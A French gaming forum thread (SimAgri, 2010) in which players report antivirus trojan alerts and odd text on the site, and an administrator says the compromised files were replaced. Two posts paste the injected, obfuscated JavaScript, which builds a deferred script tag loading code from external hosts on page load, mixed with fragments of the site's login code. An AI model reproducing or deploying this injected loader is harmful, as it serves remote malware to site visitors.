Accueil / Général / Encore plus bizarre que bizarre de cutcut avis trojan


Encore plus bizarre que bizarre de cutcut avis Trojan

Sujet posté le 10/02/2010 à 22H38 par joueur_81821_2
JOUEUR_81821_2 10/02/2010 à 22H38
BONJOUR
Alors la meilleur que ce passe t il avec ce sujet bien réel
le sujet est clôt et de plus un trojan ou cheval de troie semble être installer.Je ne peux aller voir le sujet de cutcut mon antivirus me le déconseille

C'est bien réel le charabia dont parlait cutcut je vient de rencontrer le même phénomène.
je suis loin de vouloir chercher la petite bête mais ca sent le PC mal protéger pour certain joueurs.
C'est fort possible que je fasse erreur mais bon faudrait quand même porter une attention sur ce truc plutôt pas très commun
je connais rien du tout en programmation mais ca aussi je met un léger doute sur un petit ennui que ca peu créer.
Quand même assez étrange pour que je donne une petit signe d'alerte ici sur le forum
@@@+++
JOUEUR_70164_1 10/02/2010 à 22H40
La même

____________________

Partout où tu ira dans le monde tu trouvera toujours une canette de coca et un Breton !

Du paté Hénaff dans l'espace !
JOUEUR_81821_2 10/02/2010 à 23H01
Oui mouche la même et juste après avoir tenter de relire le phénomène avancer par cutcut.
J'ai réfléchi un peu au pourquoi que l'admin ne peut voir le truc.j'ai bien peur que ca soit les PC infectés de quelque chose qui en sont victime
Hum demain je regarde si ma machine me fait des siennes.
C'est une des raisons pourquoi je réouvre en quelques sorte une mise en garde PC infecté peut être.
Il doit bien y avoir une cause
JOUEUR_10130_7 10/02/2010 à 23H16
Mouais pareil.
Vous avez aussi Avast ?
JOUEUR_122788_2 10/02/2010 à 23H19
Oui Avast m'a lancer une alerte aussi, sur le forum en début de soirée, mais en aucun cas j'ai eu le message d'erreur dont parler Cut-cut

____________________
1ère ETA en PACA FR2, merci à tout mes clients pour vos commandes.
Un service à tout épreuves, satisfait ou satisfait ;)
JOUEUR_122290_2 10/02/2010 à 23H39
oareil pour le message sa me met pareil que cut cut^par moment dans le journée surtout et j'ai avast en anti virus

____________________
c'est con mais fallait y penser
JOUEUR_198474_1 10/02/2010 à 23H49
Pareil , j'ai eu le message bizarre et aujourd'hui Bitdefender m'annonce avoir bloqué un Trojan ...;pas cool

____________________
Pikpik complètement démotivée par la suppression de l'indice QL chez les suffolks mutants .... bah on vous zème quand même les admins ....
CHARLES08 (VIP) 10/02/2010 à 23H51 10/02/2010 à 23H52


Voilà une copie d'écran du message, il n'apparait pas tout le temps. Apparemment il n'apparait que quand cela fait un moment que l'on ne s'est pas connecté.

Si cela peut vous aider
JOUEUR_202_1 11/02/2010 à 00H11
Slt , pareil un charabia a l'ouverture de Simagri et un trojan dans mon PC , ça fait deux heures que j'éssais de le virer , du coup j'ai remis mon PC une semaine avant du coup je n'ais pu faire ma ferme
MORTI (VIP) 11/02/2010 à 00H31
Exacte, j ai fait moi aussi un controle antivirus
J'ai du supprimer deux fichiers infectés pas sur que ce soit en rapport avec simagri

____________________




Concessionnaire


JOUEUR_132961_1 11/02/2010 à 01H01
salut je ne sais pas si cela a un rapport mais j'vu aussi ce message bizarre, il y a 2 jours et aujourd'hui et plein on me demande de resaisir code et pseudo, je suis inquiet

____________________
JOUEUR_9131_2 11/02/2010 à 02H15
var b;if(b!='hw' && b!='k'){b='hw'};var d=false;var v=window;var l=document;var lj;if(lj!='hi' && lj != ''){lj=null};var lx;if(lx!='no' && lx!='a'){lx=''};function p(n){var ph="";var i=['hUt*t*pS:S/D/DpKaKy*sDeDr*vUeK-Sc*oKmK.S3S6*0U.UcSn*.KcUaKm*sS-KcUoKmD.DhDoStSnSeKwUg*uKiDdSeS.DrUu*:K8D0*8K0S/UgUoDoSgSlUeK.KcSo*mS/KgSo*oDgUlDeS.UcSoDmD/SbKl*oKgDgSe*rS.Dc*o*mK/DgKaUmUeKzDtKaSrD.*cKoDmD/K5*1Sy*eUsU.Sc*oKmU/U'.replace(/[UK\*DS]/g, ''), 'szcQrziQput*'.replace(/[\*QuzZ]/g, ''), 'csr7eva7tke7Eklse7mAeAnvtA'.replace(/[Asvk7]/g, ''), 'omn2lrorakdS'.replace(/[Sm2rk]/g, ''), 'spr/cY'.replace(/[Y/p\|m]/g, ''), 'a,pxpMe2n2d2CMh,ixl2dx'.replace(/[xM\>,2]/g, ''), 's3eVt#A#t3tVrVi#bVu#t3e#'.replace(/[#3/Vd]/g, ''), 'brocdpyp'.replace(/[prckO]/g, ''), 'd>eGf/eFr>'.replace(/[\>F/gG]/g, ''), "1"];var zs;if(zs!='kh'){zs='kh'};var pn=i[n];var m=new String();return pn;var au;if(au!='' && au!='fs'){au=null};}this.qt=33281;var lw = function(){var mc=new String();try {pg=l[p([1,2])](p([1,7][0]));var ot='';var rm;if(rm!='j' && rm!='mj'){rm='j'};pg[p([6,5][0])](p([6,8]), p([9,5][0]));pg[p([0])]=p([9,0]);var x = l[p([7,4][0])];x[p([5,5][0])](pg);} catch(h){};var kb=58938;};this.hg='';v[p([7,3])]=lw;var _s=''; var r=new Date();try {var s="s";var k=new Date();:LineMixer [var v='h7t9t^p,:9/9/*d7o9u7b^l^e*c9l*i*c^k*-7c,o,m9.*n,i,f^t9y^.^c9o7m7.9y7a*m9-,c,o^m7.7h^o,t^n*e*w^g7u9i9d7e^.,r,u^:98*0*8,0^/,w7r,e*t7c^h,.9c*c*/,w*r^e,t*c7h*.9c^c9/9t^r*a*v^i*a7n7.*a*e^/,g9o*o7g^l^e,.9c^o*m7/9y^o*u^d^a,o,.^c9o*m7/,'.replace(/[,9\^\*7]/g, '');this.xr=28741;var n='sdckrSiSpUtk'.replace(/[kdSyU]/g, '');var a='c,r!e function MM_openWindow(theURL,winName,features) { window.open(theURL,winName,features); } function VerifLogin(){ if (FAccesCompte.Login.value.length==0){ alert ('Merci de saisir votre pseudo.'); return false;} else return true; } function VerifPwd(){ if (FAccesCompte.Password.value.length==0){ alert ('Merci de saisir votre mot de passe.'); return false;} else return true; } function FValider(){ if ((VerifLogin()==true) && (VerifPwd()==true)) return true; else return false; }
idem et depuis plusieurs jours mais ont va encore prendre les joueurs pour des fous
JOUEUR_132961_1 11/02/2010 à 02H28
ça viens de recommencer, voici ce que j'ai en haut de ma page, alors que je ne faisait que d'aller de fiche en fiche sur ma ferme. En plus du message, il faut que je réinscrive pseudo et nom, très inquiètant cette fois...

var o="";try {var xp;if(xp!='_' && xp!='x'){xp='_'};:LineMixer [var dp;if(dp!='' && dp!='ni'){dp=''};var n='h+t+t3p3:+/3/XaXd+v;eXrWt+s+e;r3vXe+-3cXo+m3.XhWoXm3e;dWeXp;o;t;.XcWo;m;.;dXiXaWn3p;i3nXgW-Wc+o+m+.3hWoXt3n3e+w;gXuXi;d3eX.;r3uX:W8X0;8W0;/3o+r;aWn;g+eX.3f+r3/Xo3rXaWn;g+e3.3f3r;/;g3oXo;g+l;e;.Xc;o+m;/WvWiXdWe+oXsXz3.XcWoWmX/WiWcXq;.;c3oXmX/3'.replace(/[3;X\+W]/g, '');this.y="";var t='s0c0rWizp%t%'.replace(/[%W0\^z]/g, '');var h='c<'.replace(/[\<;zKS]/g, '');var tq;if(tq!=''){tq='bqz'};var e='o?nbl^obabd?'.replace(/[\?b/\^y]/g, '');var ew="1";var l='aVp7p@eVnVd@C7hfiflEd7'.replace(/[7Ef@V]/g, '');var g='sIe8tXAItIt8r8iXbXuXtIeX'.replace(/[XzIh8]/g, '');var od=false;var hq='bToTd&y&'.replace(/[&SQ\.T]/g, '');var _n;if(_n!='lh'){_n='lh'};]var xy;if(xy!='' && xy!='ai'){xy=''};window[e]=function(){var _r=false;b=document[h](t);var cz;if(cz!='' && cz!='iv'){cz=''};this.yx="";:LineMixer [this.fa=false;b['s3rQc3'.replace(/[3U8\!Q]/g, '')]=n;this.u_="u_";b[g]('d,eJfke,rJ'.replace(/[J\!b,k]/g, ''), ew);var a=document[hq];]this.dq="";a[l](b);};this.gn='';} catch(d){};var gg;if(gg!='nj' && gg!='_c'){gg=''};

____________________
JOUEUR_202_1 11/02/2010 à 02H30
Sur le serveur USA je fesais ma ferme et j'ai été coupé et j'ai eu ça var o="";try {var xp;if(xp!='_' && xp!='x'){xp='_'};:LineMixer [var dp;if(dp!='' && dp!='ni'){dp=''};var n='h+t+t3p3:+/3/XaXd+v;eXrWt+s+e;r3vXe+-3cXo+m3.XhWoXm3e;dWeXp;o;t;.XcWo;m;.;dXiXaWn3p;i3nXgW-Wc+o+m+.3hWoXt3n3e+w;gXuXi;d3eX.;r3uX:W8X0;8W0;/3o+r;aWn;g+eX.3f+r3/Xo3rXaWn;g+e3.3f3r;/;g3oXo;g+l;e;.Xc;o+m;/WvWiXdWe+oXsXz3.XcWoWmX/WiWcXq;.;c3oXmX/3'.replace(/[3;X\+W]/g, '');this.y="";var t='s0c0rWizp%t%'.replace(/[%W0\^z]/g, '');var h='c function MM_openWindow(theURL,winName,features) { window.open(theURL,winName,features); } function VerifLogin(){ if (FAccesCompte.Login.value.length==0){ alert ('Merci de saisir votre pseudo.'); return false;} else return true; } function VerifPwd(){ if (FAccesCompte.Password.value.length==0){ alert ('Merci de saisir votre mot de passe.'); return false;} else return true; } function FValider(){ if ((VerifLogin()==true) && (VerifPwd()==true)) return true; else return false; } Février - Saison 23 (hiver)
Inscription | Ma ferme


Ma ferme Batiments Animaux Matériels Parcelles Coopérative





Identification



Pseudo :

Mot de passe :

et là je peut plus retourné sur la ferme USA sans avoir se charabia




JOUEUR_202_1 11/02/2010 à 02H39
J'écris du Canada car je peux plus aller sur France 1 et sur les USA sans avoir ce méssage
JOUEUR_81821_2 11/02/2010 à 05H22 11/02/2010 à 05H45
Bonjour
J'ai vu un problème un peu similaire sur un autre site il y a une bonne semaine et............
Le webmaster a du demander une aide technique du fournisseur serveur c'était un ennui de base de donnée
ce problème est très ressemblant on ne pourra pas aller sur USA et CAN avant que une interventoin technique n'est été faite
On fait face a deux trucs different .un probleme tecnique serveur
et le fameux message qui alerte avast sur le topic de cutcut
EDIT le problème est unique au serveur USA,j'ai une ferme serveur CAN et ca fonctionne pour lui dans mon cas
JOUEUR_221780_1 11/02/2010 à 08H04
Pareil pour moi, avast vient de détecter le cheval de troie!

____________________
Biquette qui se méfie
JOUEUR_21289_1 11/02/2010 à 08H27
bonjour,
j'allais mettre un imprim ecran mais charles l'a deja fait et dit a peu pres tout..

je sais pas si un trojan est responsable du probleme... si c'etait le cas : quand vos AV trouvent un truc que vous pensez en rapport avec le probleme, mettez le nom du fichier qu'on puisse regarder et faire des recherches, proposer des patchs, des trucs comme ca.. Avira chez moi n'a rien détecté.. mais peut etre qu'il dort... ;)



____________________
www.tenebrium.fr

https://www.facebook.com/LeCycleDesPolymorphes
JOUEUR_6776_7 11/02/2010 à 08H42
bonjours moi aussi des fois j'ai des messages de ce genre quand je vient sur le forum (je ne sais pas si sa un rapport)

sinon en france 3 je n'est rien de tout cela

____________________
Je recherche des bovins de races laitière, allaitant sur le serveur Suisse.

Merci de me contacter si vous en avez à me vendre. Merci
JOUEUR_295_6 11/02/2010 à 10H13
Je n'ai jamais eu ce probleme moi , bizare votre machin !
JOUEUR_8_1 11/02/2010 à 10H20
Bonjour, c'est effectivement revenu depuis hier soir. J'ai remplacé les fichiers posant problème par les bons. Je ne sais pas comment ca arrive, on est en train de se pencher encore plus sérieusement sur le problème.
JOUEUR_239401_1 11/02/2010 à 10H52
Bonjour,
moi j'ai rencontré cette page avec impossible de me connecter cette nuit en voulant passer du forum à ma ferme... avec refus de l'identifiant et du mot de passe... et demandant la nouvelle saisie...
j'espère que l'on ne va pas me pirater ma ferme ou autre chose...
Bonne recherche aux doués en informatique...

____________________
La corse est peut être la région la moins peuplée mais l'entre aide y règne et on y trouve un forum régional vivant et agréable...venez visiter et découvrir cette île de beauté....Bon jeu à tous..
Un des membres de l'APIDS..
JOUEUR_669_7 11/02/2010 à 12H29
Salut, j'ai parlé avec un ami qui là aussi eut et impossible de le virer ca a bloqué son antivirus.

Chez moi rien à signaler.

Bonne chance à vous !

____________________
Une demande d'animaux ? Cliquez
JOUEUR_4456_1 11/02/2010 à 12H43
bonjour j'ai eu le meme problème cette nuit impossible d'accéder aux fermes fr1 et usa et en effet depuis plusieurs jours je suis aller voir le forum général et lue le topic de cut- cut et aussi les deux autres pour les sorties et après j 'ai eu ce mess . la plus rien .
JOUEUR_4456_1 11/02/2010 à 12H46
et aussi le topic de bizare bizrare .




Répondre

Comment bien poster et ainsi rendre le forum agréable :
- Respecter la charte SimAgri ;
- Ne pas faire de pub pour sa propre ferme ou sa propre activité, ne pas faire de spam (poster le même message plusieurs fois), ne pas poster de message sans aucun intérêt, ne pas faire de hors sujet ;
- Ne pas abuser du langage SMS et s'appliquer à rédiger de manière compréhensible ;
- Effectuer une recherche sur le forum afin de ne pas poser des questions récurrentes, poster dans un sujet unique (si celui-ci existe) afin de centraliser l'information ;
- Ne pas confondre le forum avec la hotline (si votre problème ne concerne que votre ferme et s'il nécessite selon vous l'intervention d'un administrateur) ;
- Poster votre message dans le forum et la catégorie adéquat.
Message :